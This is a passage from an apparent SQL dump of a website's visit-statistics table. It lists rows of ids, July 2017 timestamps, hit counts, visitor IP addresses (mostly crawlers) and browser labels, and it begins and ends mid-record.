,'157.55.39.35','other'),(130545,1499499976,1,1,0,0,'216.244.66.237','other'),(130546,1499500140,1,0,1,0,'66.249.76.108',''),(130547,1499500255,1,1,0,0,'95.108.179.15','other'),(130548,1499500804,1,1,0,0,'51.255.65.31','other'),(130549,1499500869,1,1,0,0,'51.255.71.133','other'),(130550,1499501158,4,4,0,0,'216.244.66.246','other'),(130551,1499501205,1,1,0,0,'51.255.65.35','other'),(130552,1499501391,1,1,0,0,'51.255.65.28','other'),(130553,1499502384,1,1,0,0,'217.182.132.27','other'),(130554,1499502595,1,1,0,0,'137.74.207.102','other'),(130555,1499502651,1,1,0,0,'51.255.65.94','other'),(130556,1499502699,93,93,0,0,'106.43.115.166','other'),(130557,1499502722,2,2,0,0,'106.43.115.166','firefox'),(130558,1499502726,2,2,0,0,'106.43.115.166','msie'),(130559,1499502886,2,2,0,0,'91.209.11.236','other'),(130560,1499502902,1,1,0,0,'217.182.132.73','other'),(130561,1499504333,1,1,0,0,'137.74.207.161','other'),(130562,1499506103,1,1,0,0,'130.180.209.31','chrome'),(130563,1499506707,3,3,0,0,'216.244.66.246','other'),(130564,1499507118,1,1,0,0,'217.182.132.179','other'),(130565,1499507355,1,1,0,0,'51.255.71.122','other'),(130566,1499507551,1,1,0,0,'51.255.65.86','other'),(130567,1499507639,1,0,1,0,'66.249.76.91',''),(130568,1499507892,2,2,0,0,'95.108.213.34','other'),(130569,1499507902,1,0,1,0,'66.249.76.89',''),(130570,1499508261,1,1,0,0,'217.182.132.91','other'),(130571,1499508268,1,1,0,0,'95.108.179.15','other'),(130572,1499508649,1,1,0,0,'137.74.207.101','other'),(130573,1499508715,1,1,0,0,'217.182.132.90','other'),(130574,1499508931,1,1,0,0,'87.250.224.7','other'),(130575,1499509007,2,2,0,0,'216.244.66.194','other'),(130576,1499509564,1,1,0,0,'180.76.15.153','other'),(130577,1499509676,4,4,0,0,'62.210.157.95','other'),(130578,1499509692,1,1,0,0,'51.255.65.224','other'),(130579,1499509716,1,1,0,0,'217.182.132.18','other'),(130580,1499509837,1,1,0,0,'8.29.198.26','other'),(130581,1499510143,1,1,0,0,'5.189.186.226','other'),(130582,1499511211,1,1,0,0,'95.108.213.34','other'),(130583,1499511524,1,1,0,0,'51.255.65.14','other'),(130584,1499511949,4,4,0,0,'216.244.66.246','other'),(130585,1499512686,1,1,0,0,'217.182.132.193','other'),(130586,1499512756,1,1,0,0,'51.255.65.87','other'),(130587,1499512795,1,1,0,0,'95.108.213.34','other'),(130588,1499512797,1,1,0,0,'217.69.133.5','other'),(130589,1499513520,1,1,0,0,'51.255.71.110','other'),(130590,1499514505,2,0,2,0,'66.249.76.93',''),(130591,1499516268,1,1,0,0,'51.255.65.7','other'),(130592,1499516410,1,1,0,0,'95.108.179.15','other'),(130593,1499516720,1,1,0,0,'217.182.132.173','other'),(130594,1499516835,1,1,0,0,'95.108.213.34','other'),(130595,1499516839,1,1,0,0,'87.250.224.7','other'),(130596,1499517131,1,1,0,0,'51.255.65.89','other'),(130597,1499517207,1,1,0,0,'51.255.65.20','other'),(130598,1499517728,1,1,0,0,'217.182.132.28','other'),(130599,1499517793,1,1,0,0,'178.154.200.37','other'),(130600,1499518008,2,2,0,0,'51.255.65.71','other'),(130601,1499518024,1,1,0,0,'95.108.179.15','other'),(130602,1499518057,1,1,0,0,'217.182.132.171','other'),(130603,1499518277,1,1,0,0,'217.182.132.67','other'),(130604,1499518284,1,1,0,0,'217.182.132.76','other'),(130605,1499518408,1,1,0,0,'217.69.133.194','other'),(130606,1499518548,2,2,0,0,'95.108.213.34','other'),(130607,1499518734,1,1,0,0,'51.255.65.36','other'),(130608,1499518795,1,1,0,0,'195.154.251.162','chrome'),(130609,1499519106,1,1,0,0,'216.244.66.246','other'),(130610,1499519418,4,4,0,0,'216.244.66.194','other'),(130611,1499520358,1,0,1,0,'66.249.66.75',''),(130612,1499520523,1,1,0,0,'51.255.65.14','other'),(130613,1499520668,1,1,0,0,'8.29.198.27','other'),(130614,1499520784,2,2,0,0,'95.108.213.34','other'),(130615,1499521027,1,1,0,0,'217.182.132.240','other'),(130616,1499521247,1,1,0,0,'217.182.132.181','other'),(130617,1499521903,1,1,0,0,'157.55.39.35','other'),(130618,1499522257,1,0,1,0,'66.249.66.75',''),(130619,1499522437,1,0,1,0,'66.249.76.89',''),(130620,1499522687,4,4,0,0,'216.244.66.246','other'),(130621,1499522820,2,2,0,0,'95.108.179.15','other'),(130622,1499523589,2,0,2,0,'66.249.76.107',''),(130623,1499523767,1,1,0,0,'66.102.9.29','chrome'),(130624,1499524541,1,1,0,0,'217.182.132.185','other'),(130625,1499525248,1,1,0,0,'151.80.27.118','other'),(130626,1499525298,1,1,0,0,'217.182.132.77','other'),(130627,1499525574,1,1,0,0,'164.132.162.160','other'),(130628,1499525774,1,1,0,0,'91.209.11.236','other'),(130629,1499526280,1,1,0,0,'217.182.132.51','other'),(130630,1499526642,2,2,0,0,'95.108.213.34','other'),(130631,1499527163,1,1,0,0,'217.182.132.62','other'),(130632,1499527765,1,1,0,0,'216.244.66.237','other'),(130633,1499528457,1,1,0,0,'91.196.178.38','chrome'),(130634,1499528557,3,3,0,0,'216.244.66.194','other'),(130635,1499528593,4,4,0,0,'216.244.66.246','other'),(130636,1499528763,1,1,0,0,'37.55.226.10','chrome'),(130637,1499528800,1,1,0,0,'51.255.65.53','other'),(130638,1499529248,1,1,0,0,'51.255.65.11','other'),(130639,1499529458,1,1,0,0,'217.182.132.151','other'),(130640,1499530265,1,1,0,0,'164.132.162.160','other'),(130641,1499530326,1,1,0,0,'217.182.132.29','other'),(130642,1499530739,2,0,2,0,'66.249.76.91',''),(130643,1499530773,1,1,0,0,'217.182.132.58','other'),(130644,1499530895,1,1,0,0,'216.244.66.237','other'),(130645,1499531497,1,1,0,0,'8.29.198.26','other'),(130646,1499531873,1,1,0,0,'164.132.162.164','other'),(130647,1499532036,1,1,0,0,'95.108.213.34','other'),(130648,1499532082,1,1,0,0,'217.182.132.20','other'),(130649,1499532235,1,1,0,0,'217.182.132.172','other'),(130650,1499532647,1,1,0,0,'216.244.66.246','other'),(130651,1499533087,1,1,0,0,'95.108.213.34','other'),(130652,1499533308,1,1,0,0,'217.182.132.63','other'),(130653,1499533317,1,1,0,0,'157.55.39.178','other'),(130654,1499533465,1,1,0,0,'51.255.65.14','other'),(130655,1499533484,1,1,0,0,'217.182.132.61','other'),(130656,1499533490,1,1,0,0,'51.255.65.54','other'),(130657,1499534053,1,0,1,0,'66.249.76.107',''),(130658,1499534110,1,1,0,0,'217.182.132.70','other'),(130659,1499534177,1,1,0,0,'157.55.39.35','other'),(130660,1499534934,1,1,0,0,'66.249.76.108','chrome'),(130661,1499535243,1,1,0,0,'217.69.133.3','other'),(130662,1499535446,1,1,0,0,'51.255.65.79','other'),(130663,1499535516,1,1,0,0,'66.249.76.93','chrome'),(130664,1499535665,1,1,0,0,'95.108.213.34','other'),(130665,1499535912,1,1,0,0,'217.182.132.64','other'),(130666,1499536181,1,1,0,0,'164.132.162.159','other'),(130667,1499537809,1,1,0,0,'95.108.179.15','other'),(130668,1499538088,1,1,0,0,'94.254.242.88','chrome'),(130669,1499538184,1,1,0,0,'66.249.76.108','chrome'),(130670,1499538424,1,1,0,0,'66.249.76.91','chrome'),(130671,1499538486,1,1,0,0,'157.55.39.125','other'),(130672,1499539108,1,1,0,0,'95.108.213.34','other'),(130673,1499539301,4,4,0,0,'216.244.66.194','other'),(130674,1499539571,1,1,0,0,'51.255.71.114','other'),(130675,1499539855,1,1,0,0,'95.108.179.15','other'),(130676,1499539966,1,1,0,0,'137.74.207.108','other'),(130677,1499541532,1,1,0,0,'37.9.113.38','other'),(130678,1499542177,1,1,0,0,'217.69.133.3','other'),(130679,1499542258,1,1,0,0,'216.244.66.246','other'),(130680,1499542325,1,1,0,0,'8.29.198.25','other'),(130681,1499543174,1,1,0,0,'37.9.113.38','other'),(130682,1499543177,1,1,0,0,'87.250.224.24','other'),(130683,1499543574,1,1,0,0,'217.182.132.182','other'),(130684,1499544506,1,1,0,0,'217.182.132.180','other'),(130685,1499544752,1,0,1,0,'66.249.76.108',''),(130686,1499545062,1,0,1,0,'66.249.76.93',''),(130687,1499545371,1,1,0,0,'51.255.71.132','other'),(130688,1499545692,1,1,0,0,'217.182.132.6','other'),(130689,1499546099,1,1,0,0,'164.132.162.154','other'),(130690,1499546514,4,4,0,0,'216.244.66.194','other'),(130691,1499546880,1,0,1,0,'66.249.76.108',''),(130692,1499546980,2,0,2,0,'66.249.66.74',''),(130693,1499547194,1,1,0,0,'217.182.132.25','other'),(130694,1499547938,2,2,0,0,'216.244.66.246','other'),(130695,1499548256,1,0,1,0,'66.249.66.156',''),(130696,1499548485,1,1,0,0,'109.162.70.66','chrome'),(130697,1499548957,1,1,0,0,'217.182.132.150','other'),(130698,1499549625,1,1,0,0,'95.108.179.15','other'),(130699,1499549822,1,1,0,0,'51.255.65.97','other'),(130700,1499550044,1,1,0,0,'51.255.65.40','other'),(130701,1499550645,1,1,0,0,'217.182.132.54','other'),(130702,1499550759,1,1,0,0,'91.209.11.236','other'),(130703,1499551067,1,1,0,0,'217.182.132.187','other'),(130704,1499551238,1,1,0,0,'66.249.76.107','chrome'),(130705,1499551481,1,1,0,0,'51.255.65.12','other'),(130706,1499551488,1,0,1,0,'66.249.76.89',''),(130707,1499551698,1,1,0,0,'66.249.76.91','chrome'),(130708,1499551788,1,0,1,0,'66.249.66.75',''),(130709,1499552002,1,1,0,0,'95.108.213.34','other'),(130710,1499552508,1,1,0,0,'5.1.27.31','firefox'),(130711,1499552589,1,1,0,0,'66.249.76.89','chrome'),(130712,1499553040,1,1,0,0,'95.108.213.34','other'),(130713,1499553098,1,1,0,0,'217.182.132.52','other'),(130714,1499553155,1,1,0,0,'8.29.198.25','other'),(130715,1499553498,1,1,0,0,'216.244.66.194','other'),(130716,1499553502,1,1,0,0,'216.244.66.246','other'),(130717,1499553666,1,1,0,0,'217.182.132.150','other'),(130718,1499553817,1,1,0,0,'157.55.39.178','other'),(130719,1499554086,1,1,0,0,'217.182.132.81','other'),(130720,1499554171,1,1,0,0,'217.182.132.173','other'),(130721,1499554218,1,1,0,0,'95.108.213.34','other'),(130722,1499554277,1,1,0,0,'217.182.132.77','other'),(130723,1499554533,1,0,1,0,'66.249.76.89',''),(130724,1499554576,1,0,1,0,'66.249.66.75',''),(130725,1499554996,1,1,0,0,'217.182.132.185','other'),(130726,1499555046,2,2,0,0,'216.244.66.246','other'),(130727,1499555497,2,2,0,0,'91.209.11.236','other'),(130728,1499556387,1,0,1,0,'66.249.76.89',''),(130729,1499556718,1,1,0,0,'51.255.65.66','other'),(130730,1499556789,1,1,0,0,'51.255.65.80','other'),(130731,1499557543,1,1,0,0,'217.182.132.186','other'),(130732,1499557619,1,1,0,0,'141.8.132.39','other'),(130733,1499557991,1,1,0,0,'51.255.71.115','other'),(130734,1499558095,1,1,0,0,'51.255.65.58','other'),(130735,1499558102,1,1,0,0,'91.209.11.236','other'),(130736,1499558280,1,1,0,0,'180.76.15.17','other'),(130737,1499558740,7,7,0,0,'216.244.66.194','other'),(130738,1499558892,1,1,0,0,'217.182.132.82','other'),(130739,1499558946,1,0,1,0,'66.249.76.91',''),(130740,1499559315,1,1,0,0,'51.255.65.87','other'),(130741,1499560043,1,1,0,0,'51.255.65.67','other'),(130742,1499560995,1,1,0,0,'66.249.76.109','chrome'),(130743,1499561070,2,2,0,0,'91.209.11.236','other'),(130744,1499561144,1,1,0,0,'66.249.76.93','chrome'),(130745,1499561300,1,1,0,0,'51.255.65.32','other'),(130746,1499561396,1,1,0,0,'217.182.132.33','other'),(130747,1499561579,1,1,0,0,'217.182.132.151','other'),(130748,1499562038,2,2,0,0,'51.255.65.75','other'),(130749,1499562098,1,1,0,0,'217.182.132.23','other'),(130750,1499562403,1,1,0,0,'51.255.65.57','other'),(130751,1499562751,1,1,0,0,'178.255.215.94','other'),(130752,1499562826,1,1,0,0,'87.250.224.4','other'),(130753,1499562954,1,0,1,0,'66.249.76.91',''),(130754,1499563194,1,1,0,0,'151.80.27.118','other'),(130755,1499563260,1,1,0,0,'51.255.65.2','other'),(130756,1499563323,1,1,0,0,'217.69.133.5','other'),(130757,1499563744,1,1,0,0,'91.209.11.236','other'),(130758,1499563954,4,4,0,0,'216.244.66.246','other'),(130759,1499563980,1,1,0,0,'8.29.198.27','other'),(130760,1499563993,1,1,0,0,'66.249.76.93','chrome'),(130761,1499564047,1,1,0,0,'37.73.249.112','chrome'),(130762,1499564520,1,1,0,0,'66.249.76.107','chrome'),(130763,1499564537,1,1,0,0,'137.74.207.108','other'),(130764,1499564887,1,1,0,0,'51.255.65.63','other'),(130765,1499565460,1,1,0,0,'51.255.65.36','other'),(130766,1499565577,1,1,0,0,'51.255.65.49','other'),(130767,1499566295,1,1,0,0,'51.255.71.101','other'),(130768,1499566503,1,1,0,0,'51.255.71.111','other'),(130769,1499566561,1,1,0,0,'95.108.213.34','other'),(130770,1499566685,1,1,0,0,'91.209.11.236','other'),(130771,1499566969,2,2,0,0,'216.244.66.246','other'),(130772,1499567118,1,1,0,0,'51.255.65.56','other'),(130773,1499567351,1,1,0,0,'51.255.65.20','other'),(130774,1499567495,1,1,0,0,'217.182.132.176','other'),(130775,1499567607,1,1,0,0,'217.182.132.95','other'),(130776,1499567645,1,1,0,0,'164.132.162.188','other'),(130777,1499567865,1,1,0,0,'51.255.65.77','other'),(130778,1499568072,1,1,0,0,'217.182.132.152','other'),(130779,1499568451,1,0,1,0,'66.249.76.93',''),(130780,1499568462,1,1,0,0,'91.209.11.236','other'),(130781,1499568522,1,1,0,0,'66.249.76.93','chrome'),(130782,1499568838,2,2,0,0,'5.9.111.70','other'),(130783,1499568941,1,1,0,0,'217.69.133.194','other'),(130784,1499569392,1,0,1,0,'66.249.76.109',''),(130785,1499569543,1,1,0,0,'51.255.65.16','other'),(130786,1499569600,1,1,0,0,'95.108.213.34','other'),(130787,1499569735,1,1,0,0,'141.8.142.42','other'),(130788,1499569747,1,1,0,0,'51.255.65.53','other'),(130789,1499569776,1,1,0,0,'216.244.66.194','other'),(130790,1499569790,1,1,0,0,'217.182.132.88','other'),(130791,1499570136,2,2,0,0,'91.209.11.236','other'),(130792,1499570324,1,1,0,0,'217.182.132.59','other'),(130793,1499570449,1,1,0,0,'217.182.132.149','other'),(130794,1499570547,1,0,1,0,'66.249.76.89',''),(130795,1499571148,1,1,0,0,'95.108.179.15','other'),(130796,1499572161,1,1,0,0,'217.182.132.181','other'),(130797,1499572169,2,2,0,0,'91.209.11.236','other'),(130798,1499572252,1,0,1,0,'66.249.76.93',''),(130799,1499572660,1,1,0,0,'217.182.132.71','other'),(130800,1499572843,1,1,0,0,'51.255.65.48','other'),(130801,1499573458,2,2,0,0,'91.209.11.236','other'),(130802,1499574388,1,1,0,0,'178.154.200.2','other'),(130803,1499574436,1,1,0,0,'5.255.253.81','other'),(130804,1499574807,1,1,0,0,'8.29.198.27','other'),(130805,1499574876,1,1,0,0,'217.182.132.147','other'),(130806,1499575147,1,1,0,0,'141.8.142.42','other'),(130807,1499575326,2,2,0,0,'91.209.11.236','other'),(130808,1499575666,1,0,1,0,'68.180.230.48',''),(130809,1499575988,1,1,0,0,'51.255.71.111','other'),(130810,1499576444,2,2,0,0,'216.244.66.246','other'),(130811,1499576622,1,1,0,0,'51.255.65.70','other'),(130812,1499576748,1,1,0,0,'217.182.132.72','other'),(130813,1499577153,7,7,0,0,'216.244.66.194','other'),(130814,1499577515,1,1,0,0,'91.209.11.236','other'),(130815,1499577721,1,1,0,0,'51.255.65.9','other'),(130816,1499577822,1,1,0,0,'141.8.142.97','other'),(130817,1499578417,2,2,0,0,'216.244.66.246','other'),(130818,1499578952,1,1,0,0,'51.255.65.24','other'),(130819,1499578993,1,1,0,0,'178.154.200.2','other'),(130820,1499579014,1,1,0,0,'66.249.66.157','chrome'),(130821,1499579070,1,1,0,0,'51.255.71.130','other'),(130822,1499579318,1,1,0,0,'51.255.65.53','other'),(130823,1499579322,1,1,0,0,'91.209.11.236','other'),(130824,1499579623,1,1,0,0,'5.255.253.58','other'),(130825,1499579807,1,0,1,0,'66.249.66.74',''),(130826,1499580007,1,1,0,0,'217.182.132.94','other'),(130827,1499580199,1,1,0,0,'79.143.42.90','other'),(130828,1499580638,1,1,0,0,'217.182.132.91','other'),(130829,1499580689,1,0,1,0,'66.249.76.109',''),(130830,1499580997,1,1,0,0,'51.255.65.4','other'),(130831,1499581265,1,1,0,0,'217.182.132.181','other'),(130832,1499581646,1,1,0,0,'217.182.132.182','other'),(130833,1499582211,1,1,0,0,'66.249.76.109','chrome'),(130834,1499582735,1,1,0,0,'51.255.65.11','other'),(130835,1499582981,1,0,1,0,'66.249.66.76',''),(130836,1499583394,1,1,0,0,'217.182.132.155','other'),(130837,1499583601,8,8,0,0,'62.138.8.181','other'),(130838,1499583833,1,1,0,0,'216.244.66.246','other'),(130839,1499584089,1,1,0,0,'141.8.142.48','other'),(130840,1499584262,1,1,0,0,'137.74.207.110','other'),(130841,1499585090,1,1,0,0,'217.182.132.191','other'),(130842,1499585217,4,4,0,0,'216.244.66.194','other'),(130843,1499585323,1,1,0,0,'141.8.142.49','other'),(130844,1499585642,1,1,0,0,'8.29.198.27','other'),(130845,1499585703,1,1,0,0,'51.255.65.83','other'),(130846,1499585840,1,1,0,0,'217.69.133.2','other'),(130847,1499585879,1,1,0,0,'217.182.132.187','other'),(130848,1499587269,2,2,0,0,'216.244.66.246','other'),(130849,1499588437,1,1,0,0,'157.55.39.178','other'),(130850,1499588698,1,1,0,0,'217.182.132.62','other'),(130851,1499588797,1,1,0,0,'51.255.65.73','other'),(130852,1499589155,1,0,1,0,'66.249.76.91',''),(130853,1499589604,3,3,0,0,'79.143.42.90','other'),(130854,1499589937,1,1,0,0,'157.55.39.178','other'),(130855,1499590478,1,1,0,0,'180.76.15.20','other'),(130856,1499590625,1,1,0,0,'51.255.65.4','other'),(130857,1499590754,1,1,0,0,'217.182.132.193','other'),(130858,1499591494,1,1,0,0,'217.69.133.9','other'),(130859,1499591654,1,0,1,0,'66.249.76.109',''),(130860,1499591667,1,1,0,0,'51.255.65.4','other'),(130861,1499591983,1,1,0,0,'51.255.65.50','other'),(130862,1499592011,1,1,0,0,'46.161.9.55','chrome'),(130863,1499592219,1,1,0,0,'157.55.39.178','other'),(130864,1499592307,1,1,0,0,'178.154.200.45','other'),(130865,1499592310,1,1,0,0,'141.8.132.43','other'),(130866,1499592382,1,1,0,0,'178.154.200.2','other'),(130867,1499592675,1,1,0,0,'51.255.65.46','other'),(130868,1499592920,1,1,0,0,'51.255.65.71','other'),(130869,1499592958,1,1,0,0,'217.182.132.90','other'),(130870,1499592980,1,1,0,0,'217.69.133.6','other'),(130871,1499593303,1,1,0,0,'95.108.179.15','other'),(130872,1499593548,1,1,0,0,'51.255.71.101','other'),(130873,1499593640,1,1,0,0,'216.244.66.246','other'),(130874,1499594081,2,2,0,0,'66.249.76.89','chrome'),(130875,1499594111,1,1,0,0,'66.249.76.109','chrome'),(130876,1499594204,1,1,0,0,'178.154.189.3','other'),(130877,1499594538,1,1,0,0,'51.255.65.19','other'),(130878,1499594662,1,1,0,0,'141.8.142.97','other'),(130879,1499595059,1,1,0,0,'51.255.47.44','other'),(130880,1499595076,1,1,0,0,'217.182.132.21','other'),(130881,1499596109,1,1,0,0,'51.255.65.80','other'),(130882,1499596184,1,1,0,0,'141.8.142.154','other'),(130883,1499596465,1,1,0,0,'8.29.198.25','other'),(130884,1499596855,1,1,0,0,'5.255.253.58','other'),(130885,1499597351,1,0,1,0,'66.249.66.74',''),(130886,1499597553,3,3,0,0,'5.9.147.133','other'),(130887,1499597771,1,1,0,0,'217.182.132.20','other'),(130888,1499597784,1,1,0,0,'157.55.39.35','other'),(130889,1499597824,1,0,1,0,'66.249.76.93',''),(130890,1499597920,1,1,0,0,'217.182.132.64','other'),(130891,1499598577,1,1,0,0,'51.255.65.57','other'),(130892,1499598681,1,1,0,0,'51.255.65.26','other'),(130893,1499598684,1,1,0,0,'217.69.133.9','other'),(130894,1499599200,1,0,1,0,'66.249.76.91',''),(130895,1499599235,1,1,0,0,'216.244.66.246','other'),(130896,1499599240,1,1,0,0,'217.182.132.96','other'),(130897,1499599611,1,1,0,0,'217.182.132.187','other'),(130898,1499599632,1,1,0,0,'51.255.65.14','other'),(130899,1499600091,1,1,0,0,'216.244.66.237','other'),(130900,1499601014,3,3,0,0,'216.244.66.194','other'),(130901,1499601775,1,1,0,0,'217.182.132.185','other'),(130902,1499601881,1,1,0,0,'164.132.162.164','other'),(130903,1499602209,1,1,0,0,'217.182.132.157','other'),(130904,1499603212,1,1,0,0,'217.182.132.180','other'),(130905,1499604399,1,1,0,0,'217.182.132.69','other'),(130906,1499605351,1,1,0,0,'51.255.65.33','other'),(130907,1499605927,3,3,0,0,'216.244.66.194','other'),(130908,1499606479,1,0,1,0,'66.249.76.91',''),(130909,1499607293,1,1,0,0,'8.29.198.26','other'),(130910,1499608039,1,1,0,0,'217.182.132.7','other'),(130911,1499608504,1,1,0,0,'217.69.133.5','other'),(130912,1499608660,1,1,0,0,'51.255.65.43','other'),(130913,1499609016,1,1,0,0,'217.182.132.70','other'),(130914,1499609235,1,1,0,0,'109.63.209.72','msie'),(130915,1499609351,1,1,0,0,'217.182.132.32','other'),(130916,1499609581,1,1,0,0,'217.182.132.77','other'),(130917,1499609830,1,1,0,0,'216.244.66.246','other'),(130918,1499609928,1,1,0,0,'51.255.65.5','other'),(130919,1499610063,1,1,0,0,'217.182.132.81','other'),(130920,1499610142,3,3,0,0,'216.244.66.194','other'),(130921,1499610552,1,1,0,0,'51.255.65.49','other'),(130922,1499610792,1,1,0,0,'51.255.65.50','other'),(130923,1499611081,1,1,0,0,'95.108.213.34','other'),(130924,1499612555,1,1,0,0,'157.55.39.109','other'),(130925,1499612741,1,1,0,0,'77.37.222.252','msie'),(130926,1499613016,1,1,0,0,'217.182.132.75','other'),(130927,1499613701,1,1,0,0,'164.132.162.153','other'),(130928,1499613807,1,1,0,0,'51.255.65.65','other'),(130929,1499613925,1,1,0,0,'95.108.179.15','other'),(130930,1499614147,1,1,0,0,'141.8.142.154','other'),(130931,1499615330,1,1,0,0,'217.182.132.30','other'),(130932,1499615770,1,0,1,0,'66.249.66.156',''),(130933,1499615895,1,1,0,0,'217.182.132.80','other'),(130934,1499616053,1,1,0,0,'217.182.132.76','other'),(130935,1499616087,1,1,0,0,'216.244.66.246','other'),(130936,1499616125,1,0,1,0,'66.249.76.108',''),(130937,1499616206,1,1,0,0,'207.46.13.39','other'),(130938,1499616500,1,1,0,0,'217.182.132.18','other'),(130939,1499616677,2,2,0,0,'51.255.71.127','other'),(130940,1499616776,1,0,1,0,'66.249.66.75',''),(130941,1499617457,1,0,1,0,'66.249.76.108',''),(130942,1499617580,1,1,0,0,'51.255.65.15','other'),(130943,1499617587,1,1,0,0,'217.182.132.72','other'),(130944,1499617599,1,1,0,0,'51.255.65.56','other'),(130945,1499617691,2,2,0,0,'216.244.66.194','other'),(130946,1499618122,1,1,0,0,'8.29.198.26','other'),(130947,1499618164,2,2,0,0,'91.209.11.236','other'),(130948,1499618178,1,1,0,0,'137.74.207.102','other'),(130949,1499618940,1,1,0,0,'164.132.162.153','other'),(130951,1499619164,1,1,0,0,'217.182.132.240','other'),(130952,1499619519,1,1,0,0,'51.255.65.84','other'),(130953,1499620273,1,1,0,0,'95.108.213.34','other'),(130954,1499620342,1,1,0,0,'216.244.66.246','other'),(130955,1499620357,1,1,0,0,'217.182.132.240','other'),(130956,1499620558,1,1,0,0,'51.255.65.64','other'),(130957,1499621114,1,0,1,0,'66.249.76.91',''),(130958,1499621288,1,1,0,0,'217.69.133.4','other'),(130959,1499621412,2,2,0,0,'95.108.213.34','other'),(130960,1499621477,1,1,0,0,'217.182.132.25','other'),(130961,1499621481,1,1,0,0,'137.74.207.108','other'),(130962,1499622143,1,1,0,0,'51.255.65.51','other'),(130963,1499622361,1,1,0,0,'95.108.213.34','other'),(130964,1499622931,1,1,0,0,'217.182.132.92','other'),(130965,1499623031,1,1,0,0,'137.74.207.119','other'),(130966,1499623096,1,1,0,0,'216.244.66.194','other'),(130967,1499623153,1,1,0,0,'217.182.132.156','other'),(130968,1499623573,1,1,0,0,'51.255.65.79','other'),(130969,1499623625,1,1,0,0,'217.182.132.32','other'),(130970,1499623644,1,1,0,0,'66.249.66.157','chrome'),(130971,1499623651,2,2,0,0,'95.108.213.34','other'),(130972,1499625366,1,1,0,0,'157.55.39.109','other'),(130973,1499625444,1,1,0,0,'217.69.133.5','other'),(130974,1499625451,1,1,0,0,'217.69.133.3','other'),(130975,1499626093,3,3,0,0,'216.244.66.246','other'),(130976,1499626179,1,0,1,0,'66.249.76.91',''),(130977,1499626347,1,1,0,0,'141.8.142.154','other'),(130978,1499626369,1,1,0,0,'95.135.90.35','chrome'),(130979,1499627052,1,0,1,0,'66.249.76.93',''),(130980,1499627646,1,1,0,0,'216.244.66.194','other'),(130981,1499627742,1,1,0,0,'66.249.66.75','chrome'),(130982,1499627967,1,1,0,0,'66.249.66.157','chrome'),(130983,1499627985,1,1,0,0,'82.145.223.94','other'),(130984,1499628051,1,1,0,0,'66.249.66.155','chrome'),(130985,1499628061,1,1,0,0,'217.182.132.91','other'),(130986,1499628558,1,1,0,0,'66.249.76.109','chrome'),(130987,1499628597,1,1,0,0,'217.182.132.94','other'),(130988,1499628950,1,1,0,0,'8.29.198.25','other'),(130989,1499628981,1,0,1,0,'66.249.76.91',''),(130990,1499629000,1,1,0,0,'95.108.179.15','other'),(130991,1499629335,1,1,0,0,'51.255.65.72','other'),(130992,1499629413,1,1,0,0,'217.182.132.88','other'),(130993,1499630135,2,1,1,0,'66.249.76.107',''),(130994,1499630312,1,1,0,0,'51.255.65.86','other'),(130995,1499630333,1,1,0,0,'51.255.71.115','other'),(130996,1499630394,1,1,0,0,'217.182.132.74','other'),(130997,1499630396,1,1,0,0,'217.182.132.240','other'),(130998,1499630528,1,1,0,0,'217.182.132.97','other'),(130999,1499630839,1,1,0,0,'66.249.66.157','chrome'),(131000,1499630928,1,1,0,0,'5.9.62.130','other'),(131001,1499630945,1,1,0,0,'217.182.132.88','other'),(131002,1499631372,1,1,0,0,'217.182.132.187','other'),(131003,1499631470,1,1,0,0,'207.46.13.39','other'),(131004,1499632130,1,1,0,0,'51.255.65.25','other'),(131005,1499632334,1,1,0,0,'141.8.142.154','other'),(131006,1499632483,1,1,0,0,'141.8.142.164','other'),(131007,1499633128,1,1,0,0,'51.255.71.125','other'),(131008,1499633226,1,1,0,0,'217.182.132.187','other'),(131009,1499633304,1,0,1,0,'66.249.76.89',''),(131010,1499633423,1,1,0,0,'216.244.66.194','other'),(131011,1499633452,1,1,0,0,'51.255.65.60','other'),(131012,1499633997,1,1,0,0,'51.255.65.31','other'),(131013,1499634927,1,1,0,0,'217.182.132.153','other'),(131014,1499635126,1,1,0,0,'216.244.66.194','other'),(131015,1499635679,1,1,0,0,'217.182.132.92','other'),(131016,1499635950,1,1,0,0,'217.182.132.180','other'),(131017,1499635972,1,1,0,0,'217.182.132.58','other'),(131018,1499636265,2,2,0,0,'216.244.66.246','other'),(131019,1499636456,1,1,0,0,'95.108.179.15','other'),(131020,1499636582,1,1,0,0,'217.182.132.65','other'),(131021,1499636758,1,1,0,0,'217.182.132.147','other'),(131022,1499636760,1,1,0,0,'217.69.133.194','other'),(131023,1499636824,1,1,0,0,'137.74.207.164','other'),(131024,1499637043,1,1,0,0,'95.108.213.34','other'),(131025,1499637939,1,1,0,0,'66.249.76.108','chrome'),(131026,1499638311,1,1,0,0,'5.255.253.58','other'),(131027,1499638314,1,1,0,0,'141.8.142.164','other'),(131028,1499638739,1,1,0,0,'217.182.132.72','other'),(131029,1499639312,1,1,0,0,'217.182.132.153','other'),(131030,1499639616,1,1,0,0,'66.249.76.108','chrome'),(131031,1499639785,1,1,0,0,'8.29.198.26','other'),(131032,1499640314,2,2,0,0,'157.55.39.178','other'),(131033,1499640380,1,1,0,0,'5.255.253.58','other'),(131034,1499640384,1,1,0,0,'216.244.66.194','other'),(131035,1499640470,1,0,1,0,'66.249.66.157',''),(131036,1499640640,1,0,1,0,'66.249.66.74',''),(131037,1499641109,1,1,0,0,'95.108.179.15','other'),(131038,1499641188,1,1,0,0,'217.182.132.149','other'),(131039,1499641223,1,1,0,0,'51.255.71.130','other'),(131040,1499641490,2,2,0,0,'216.244.66.246','other'),(131041,1499642375,2,2,0,0,'217.69.133.3','other'),(131042,1499642512,2,2,0,0,'66.249.76.107','chrome'),(131043,1499642550,1,1,0,0,'207.46.13.71','other'),(131044,1499642667,1,1,0,0,'66.249.76.108','chrome'),(131045,1499643263,1,1,0,0,'164.132.162.187','other'),(131046,1499643707,1,1,0,0,'37.9.113.38','other'),(131047,1499643914,1,1,0,0,'207.46.13.71','other'),(131048,1499644421,1,1,0,0,'217.182.132.24','other'),(131049,1499644516,1,1,0,0,'137.74.207.114','other'),(131050,1499644603,3,3,0,0,'85.102.137.76','other'),(131051,1499644792,1,1,0,0,'217.69.143.217','firefox'),(131052,1499644877,1,1,0,0,'216.244.66.237','other'),(131053,1499645474,1,1,0,0,'217.182.132.157','other'),(131054,1499645634,2,2,0,0,'95.213.141.126','opera'),(131055,1499645768,2,2,0,0,'216.244.66.194','other'),(131056,1499645819,1,1,0,0,'217.182.132.182','other'),(131057,1499645861,1,1,0,0,'141.8.142.49','other'),(131058,1499646385,1,1,0,0,'217.182.132.18','other'),(131059,1499646507,1,1,0,0,'217.182.132.16','other'),(131060,1499646579,1,1,0,0,'217.182.132.156','other'),(131061,1499646649,1,1,0,0,'